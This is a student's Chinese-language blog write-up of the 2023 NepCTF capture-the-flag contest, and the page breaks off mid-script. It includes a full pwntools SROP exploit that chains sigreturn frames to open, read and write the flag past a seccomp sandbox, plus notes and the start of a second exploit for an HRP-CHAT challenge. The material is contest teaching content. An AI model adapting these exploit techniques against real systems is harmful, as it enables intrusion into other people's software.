<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="https://github.com/lmarch2/images/blob/main/typora/202307282109602.jpg?raw=true">
  <link rel="icon" type="image/png" sizes="16x16" href="https://github.com/lmarch2/images/blob/main/typora/202307282109602.jpg?raw=true">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css" integrity="sha256-Z1K5uhUaJXA7Ll0XrZ/0JhX4lAtZFpT6jkKrEDT0drU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/themes/green/pace-theme-minimal.css">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha256-gqd7YTjg/BtfqWSwsJOvndl0Bxc8gFImLEkXQT8+qj0=" crossorigin="anonymous"></script>

<script class="next-config" data-name="main" type="application/json">{"hostname":"lmarch2.github.com","root":"/","images":"/images","scheme":"Gemini","darkmode":"ture","version":"8.14.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"style":"mac"},"bookmark":{"enable":true,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":true,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="2023NepCTF WP真的超级紧张刺激的比赛！！有做不出题目夜不能寐的痛苦，也有冥思苦想之后的豁然开朗，第一次感受到了ctf比赛的乐趣所在。虽然最后的成绩停留在110，不过对于一个初出茅庐的萌新，已经很满足了；即使比赛结束后才做出三月七和最后放出的两个pwn题（挺气的，早知道不看万恶的login的……）。那就给自己继续加油吧，希望下次比赛能拿到属于自己的一份荣誉！">
<meta property="og:type" content="article">
<meta property="og:title" content="2023NepCTF WP">
<meta property="og:url" content="http://lmarch2.github.com/posts/0/index.html">
<meta property="og:site_name" content="lmarch2&#39;blog">
<meta property="og:description" content="2023NepCTF WP真的超级紧张刺激的比赛！！有做不出题目夜不能寐的痛苦，也有冥思苦想之后的豁然开朗，第一次感受到了ctf比赛的乐趣所在。虽然最后的成绩停留在110，不过对于一个初出茅庐的萌新，已经很满足了；即使比赛结束后才做出三月七和最后放出的两个pwn题（挺气的，早知道不看万恶的login的……）。那就给自己继续加油吧，希望下次比赛能拿到属于自己的一份荣誉！">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140041407.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308151840502.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308151840711.png">
<meta property="og:image" content="c:\Users\%E8%B5%96%E5%AE%87%E5%BF%9B\AppData\Roaming\Typora\typora-user-images\image-20230815141945133.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308151840784.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140017820.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308141025369.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308151126222.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140026993.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140038661.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140038297.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308141000511.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140050622.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308292027548.png">
<meta property="og:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308292030306.png">
<meta property="article:published_time" content="2023-08-15T03:25:59.095Z">
<meta property="article:modified_time" content="2023-08-29T12:36:10.518Z">
<meta property="article:author" content="lmarch2">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140041407.png">


<link rel="canonical" href="http://lmarch2.github.com/posts/0/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://lmarch2.github.com/posts/0/","path":"posts/0/","title":"2023NepCTF WP"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>2023NepCTF WP | lmarch2'blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">lmarch2'blog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">求知若渴，虚心若愚</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#2023NepCTF-WP"><span class="nav-text">2023NepCTF WP</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#PWN"><span class="nav-text">PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#srop"><span class="nav-text">srop</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HRP-CHAT-2"><span class="nav-text">HRP-CHAT-2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HRP-CHAT-2-1"><span class="nav-text">HRP-CHAT-2</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISC"><span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#checkin"><span class="nav-text">checkin</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8EAI%E5%85%B1%E8%88%9E%E7%9A%84%E5%93%88%E5%A4%AB%E6%9B%BC"><span class="nav-text">与AI共舞的哈夫曼</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#codes"><span class="nav-text">codes</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B0%8F%E5%8F%AE%E5%BC%B9%E9%92%A2%E7%90%B4"><span class="nav-text">小叮弹钢琴</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%99%8C%E7%94%9F%E7%9A%84%E8%AF%AD%E8%A8%80"><span class="nav-text">陌生的语言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ConnectedFive"><span class="nav-text">ConnectedFive</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BD%A0%E4%B9%9F%E5%96%9C%E6%AC%A2%E4%B8%89%E6%9C%88%E4%B8%83%E4%B9%88"><span class="nav-text">你也喜欢三月七么</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="lmarch2"
      src="https://github.com/lmarch2/images/blob/main/typora/202307282109602.jpg?raw=true">
  <p class="site-author-name" itemprop="name">lmarch2</p>
  <div class="site-description" itemprop="description">A Student studying Cybersecurity</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">33</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/lmarch2" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;lmarch2" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.bilibili.com/" title="Bilibili → https:&#x2F;&#x2F;www.bilibili.com" rel="noopener me" target="_blank"><i class="fab fa-bilibili fa-fw"></i>Bilibili</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.zhihu.com/" title="Zhihu → https:&#x2F;&#x2F;www.zhihu.com" rel="noopener me" target="_blank"><i class="fab fa-zhihu fa-fw"></i>Zhihu</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.csdn.net/?spm=1001.2101.3001.4476" title="CSDN → https:&#x2F;&#x2F;www.csdn.net&#x2F;?spm&#x3D;1001.2101.3001.4476" rel="noopener me" target="_blank"><i class="fab fa-CSDN fa-fw"></i>CSDN</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.cnblogs.com/imarch22/" title="Bokeyuan → https:&#x2F;&#x2F;www.cnblogs.com&#x2F;imarch22&#x2F;" rel="noopener me" target="_blank">Bokeyuan</a>
      </span>
  </div>
  <div class="cc-license animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" class="cc-opacity" rel="noopener" target="_blank"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>
<!-- recent posts -->
    <div class="links-of-blogroll motion-element links-of-blogroll-block">
        <div class="links-of-blogroll-title recent-posts-title">
        <i class="fa fa-history " aria-hidden="true"></i>
            近期文章
    </div>
    <ul class="links-of-blogroll-list recent-posts-list">
            <li class="my-links-of-blogroll-item">
            <a href="/posts/19b7e153/" title="HASHTEAM强网杯2024wp" target="">
            HASHTEAM强网杯2024wp
            </a>
        </li>
            <li class="my-links-of-blogroll-item">
            <a href="/posts/d8c86fdf/" title="HASHTEAM-n1ctf-2023-WP" target="">
            HASHTEAM-n1ctf-2023-WP
            </a>
        </li>
            <li class="my-links-of-blogroll-item">
            <a href="/posts/2611e12a/" title="HASHTEAM香山杯WP" target="">
            HASHTEAM香山杯WP
            </a>
        </li>
            <li class="my-links-of-blogroll-item">
            <a href="/posts/ec1aa757/" title="DASCTF X CBCTF 2023 WP" target="">
            DASCTF X CBCTF 2023 WP
            </a>
        </li>
            <li class="my-links-of-blogroll-item">
            <a href="/posts/4b18615c/" title="NSSCTF 2nd wp" target="">
            NSSCTF 2nd wp
            </a>
        </li>
    </ul>
    </div>
        </div>
      </div>
    </div>

    
    <div class="links-of-blogroll motion-element links-of-blogroll-block">
      <div class="links-of-blogroll-title">
        <!-- modify icon to fire by szw -->
        <i class="fa fa-history fa-" aria-hidden="true"></i>
        近期文章
      </div>
      <ul class="links-of-blogroll-list">
        
        
          <li>
            <a href="/" title="" target="_blank"></a>
          </li>
        
          <li>
            <a href="/" title="" target="_blank"></a>
          </li>
        
          <li>
            <a href="/" title="" target="_blank"></a>
          </li>
        
          <li>
            <a href="/" title="" target="_blank"></a>
          </li>
        
          <li>
            <a href="/" title="" target="_blank"></a>
          </li>
        
      </ul>
    </div>

  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://lmarch2.github.com/posts/0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://github.com/lmarch2/images/blob/main/typora/202307282109602.jpg?raw=true">
      <meta itemprop="name" content="lmarch2">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="lmarch2'blog">
      <meta itemprop="description" content="A Student studying Cybersecurity">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="2023NepCTF WP | lmarch2'blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2023NepCTF WP
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2023-08-15 11:25:59" itemprop="dateCreated datePublished" datetime="2023-08-15T11:25:59+08:00">2023-08-15</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2023-08-29 20:36:10" itemprop="dateModified" datetime="2023-08-29T20:36:10+08:00">2023-08-29</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/" itemprop="url" rel="index"><span itemprop="name">赛题复现</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>9.9k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>9 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="2023NepCTF-WP"><a href="#2023NepCTF-WP" class="headerlink" title="2023NepCTF WP"></a>2023NepCTF WP</h1><p>真的超级紧张刺激的比赛！！有做不出题目夜不能寐的痛苦，也有冥思苦想之后的豁然开朗，第一次感受到了ctf比赛的乐趣所在。虽然最后的成绩停留在110，不过对于一个初出茅庐的萌新，已经很满足了；即使比赛结束后才做出三月七和最后放出的两个pwn题（挺气的，早知道不看万恶的login的……）。那就给自己继续加油吧，希望下次比赛能拿到属于自己的一份荣誉！</p>
<span id="more"></span>

<h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h2 id="srop"><a href="#srop" class="headerlink" title="srop"></a>srop</h2><p>使用经典srop技巧，但是在此基础上又加了orz，观察程序会发现，能够调用sigreturn（调用号为0xf），而且溢出量足够大（0x300）。整体的一个思路就是构造system call chains，伪造四个栈帧，在syscall返回的时候，rsp会返回到另一个sigframe，从而实现一个又一个的函数调用。</p>
<p>几个注意点：</p>
<ol>
<li>利用pwntools写frame的时候对各个寄存器传入的都是地址，不能直接把字符串写进去（会bytes()报错    <del>别问为什么我知道</del>）</li>
<li>返回执行系统syscall的时候注意这个程序只有call _system，而没有直接的syscall汇编指令，而进入到call _system单步调试可以发现这个过程中各个寄存器的值是会发生变化的（不同的寄存器之间赋值），所以我们在构造frame指定寄存器值的时候需要根据call _system中的指令来调整frame的各个寄存器值，sigreturn也是如此，有其他的命令会改变rax的值，因此需要多一个pop rdi控制一下</li>
<li>各个stack_frame需要精心构造</li>
<li>因为沙箱禁掉了execve，所以我们使用open,read,write绕过沙箱。（一定注意这里读取文件内容的read系统调用rdi传参是3）</li>
</ol>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">context.terminal = [<span class="string">&#x27;tmux&#x27;</span>, <span class="string">&#x27;splitw&#x27;</span>, <span class="string">&#x27;-h&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(&quot;./pwn&quot;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;nepctf.1cepeak.cn&#x27;</span>,<span class="number">31552</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line"><span class="comment">#syscall = 0x400788</span></span><br><span class="line">syscall = <span class="number">0x04005B0</span></span><br><span class="line">pop_rdi = <span class="number">0x0000000000400813</span></span><br><span class="line">sigreturn = p64(pop_rdi)+p64(<span class="number">0xf</span>)+p64(<span class="number">0x400750</span>)+p64(syscall)</span><br><span class="line">buf = <span class="number">0x0601020</span>  <span class="comment"># buf地址</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#write</span></span><br><span class="line">frame4 = SigreturnFrame(kernel=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">frame4.rdi = constants.SYS_write<span class="comment">#rax</span></span><br><span class="line">frame4.rcx = <span class="number">0x40</span><span class="comment">#rdx</span></span><br><span class="line">frame4.rsi = <span class="number">1</span><span class="comment">#rdi</span></span><br><span class="line">frame4.rdx = buf<span class="comment">#rsi</span></span><br><span class="line">frame4.rip = syscall</span><br><span class="line">frame4.rsp = buf<span class="comment">#+len(sigreturn+bytes(sigframe))  # 设置栈顶指针位置</span></span><br><span class="line">stack3 = sigreturn+<span class="built_in">bytes</span>(frame4)</span><br><span class="line"></span><br><span class="line"><span class="comment">#open</span></span><br><span class="line">frame2 = SigreturnFrame(kernel=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">frame2.rdi = constants.SYS_open<span class="comment">#rax</span></span><br><span class="line">frame2.rcx = <span class="number">0</span><span class="comment">#rdx</span></span><br><span class="line">frame2.rsi = buf<span class="comment">#rdi注意这里是不能直接传字符串&quot;flag&quot;的，而是应该传地址</span></span><br><span class="line">frame2.rip = syscall</span><br><span class="line">frame2.rsp = buf+<span class="number">5</span>+<span class="built_in">len</span>(sigreturn+<span class="built_in">bytes</span>(frame2))  <span class="comment"># 设置栈顶指针位置</span></span><br><span class="line">stack1 = sigreturn+<span class="built_in">bytes</span>(frame2)</span><br><span class="line"></span><br><span class="line"><span class="comment">#read2</span></span><br><span class="line">frame3 = SigreturnFrame(kernel=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">frame3.rdi = constants.SYS_read<span class="comment">#rax</span></span><br><span class="line">frame3.rcx = <span class="number">0x40</span><span class="comment">#rdx</span></span><br><span class="line">frame3.rsi = <span class="number">3</span><span class="comment">#rdi</span></span><br><span class="line">frame3.rdx = buf<span class="comment">#rsi</span></span><br><span class="line">frame3.rip = syscall</span><br><span class="line">frame3.rsp = buf+<span class="number">5</span>+<span class="built_in">len</span>(stack1+sigreturn+<span class="built_in">bytes</span>(frame3))  <span class="comment"># 设置栈顶指针位置</span></span><br><span class="line">stack2 = sigreturn+<span class="built_in">bytes</span>(frame3)</span><br><span class="line"></span><br><span class="line">stack_frame = <span class="string">b&quot;flag\x00&quot;</span>+stack1+stack2+stack3</span><br><span class="line"><span class="comment">#stack_frame = sigreturn+bytes(sigframe)+sigreturn+bytes(sframe)</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#read1</span></span><br><span class="line">frame = SigreturnFrame(kernel=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line">frame.rdi = constants.SYS_read<span class="comment">#rax</span></span><br><span class="line">frame.rcx = <span class="built_in">len</span>(stack_frame)<span class="comment">#rdx</span></span><br><span class="line">frame.rsi = <span class="number">0</span><span class="comment">#rdi</span></span><br><span class="line">frame.rdx = buf<span class="comment">#rsi</span></span><br><span class="line">frame.rip = syscall</span><br><span class="line">frame.rsp = buf+<span class="number">5</span>  <span class="comment"># 设置栈顶指针位置</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">bytes</span>(frame))</span><br><span class="line"></span><br><span class="line">pad = cyclic(<span class="number">0x38</span>)</span><br><span class="line">pad += sigreturn + <span class="built_in">bytes</span>(frame)</span><br><span class="line"></span><br><span class="line">p.recv()</span><br><span class="line">p.send(pad)</span><br><span class="line"></span><br><span class="line"><span class="comment">#pause(1)</span></span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.send(stack_frame)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308140041407.png" alt="image-20230814004138378"></p>
<p>可恶的Login找不出路径……</p>
<h2 id="HRP-CHAT-2"><a href="#HRP-CHAT-2" class="headerlink" title="HRP-CHAT-2"></a>HRP-CHAT-2</h2><p>真的服了….真的就差一步，下标没弄清楚，其实一个个试都可以试出来的….</p>
<p>获得攻击力最高的角色（需要抽卡得到，抽卡的次数会影响你的下标）</p>
<p>选择攻击力最强的技能，击败boss即可拿到flag</p>
<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308151840502.png" alt="image-20230815135736939"></p>
<h2 id="HRP-CHAT-2-1"><a href="#HRP-CHAT-2-1" class="headerlink" title="HRP-CHAT-2"></a>HRP-CHAT-2</h2><p>阅读源码</p>
<p><img data-src="https://raw.githubusercontent.com/lmarch2/images/main/typora/202308151840711.png" alt="image-20230815141853615"></p>
<p>main函数里执行子进程，崩溃进入CMD</p>
<p>CMD函数</p>
<p><img data-src="C:\Users\赖宇忛\AppData\Roaming\Typora\typora-user-images\image-20230815141945133.png" alt="image-20230815141945133"></p>
<p>可以想到让子进程崩溃后，进入安全模式拿flag</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>, arch=<span class="string">&#x27;amd64&#x27;</span>)</span><br><span class="line"><span class="comment">#context(os=&#x27;linux&#x27;, arch=&#x27;amd64&#x27;, log_level=&#x27;debug&#x27;)</span></span><br><span class="line"><span class="comment">#context.terminal = [&#x27;tmux&#x27;, &#x27;splitw&#x27;, &#x27;-h&#x27;]</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(&quot;./&quot;)</span></span><br><span class="line">p = remote(<span class="string">&#x27;nepctf.1cepeak.cn&#x27;</span>,<span class="number">31971</span>)</span><br><span class="line"></span><br><span class="line">sda = <span class="keyword">lambda</span> delim,data :p.sendafter(delim,data)</span><br><span class="line">sd = <span class="keyword">lambda</span> data :p.send(data)</span><br><span class="line">sea = <span class="keyword">lambda</span> delim,data :p.sendafter(delim,data)</span><br><span class="line">sl = <span class="keyword">lambda</span> data :p.sendline(data)</span><br><span class="line">sla = <span class="keyword">lambda</span> delim,data :p.sendlineafter(delim,data)</span><br><span class="line">ru = <span class="keyword">lambda</span> delims,drop=<span class="literal">True</span> :p.recvuntil(delims,drop)</span><br><span class="line">uu32 = <span class="keyword">lambda</span> data :u32(data.ljust(<span class="number">4</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">uu64 = <span class="keyword">lambda</span> data :u64(data.ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line">lg = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">&#x27;=&#x27;</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line">ia = <span class="keyword">lambda</span> :p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_addr64</span>() : <span class="keyword">return</span> u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_addr32</span>() : <span class="keyword">return</span> u32(p.recvuntil(<span class="string">b&#x27;\xf7&#x27;</span>)[-<span class="number">4</span>:])</span><br><span class="line"></span><br><span class="line">ru(<span class="string">b&#x27;help&#x27;</span>)</span><br><span class="line">sl(<span class="string">b&#x27;Login\n&#x27;</span>)</span><br><span class="line">sla(<span class="string">&#x27;6&#x27;</span>,<span 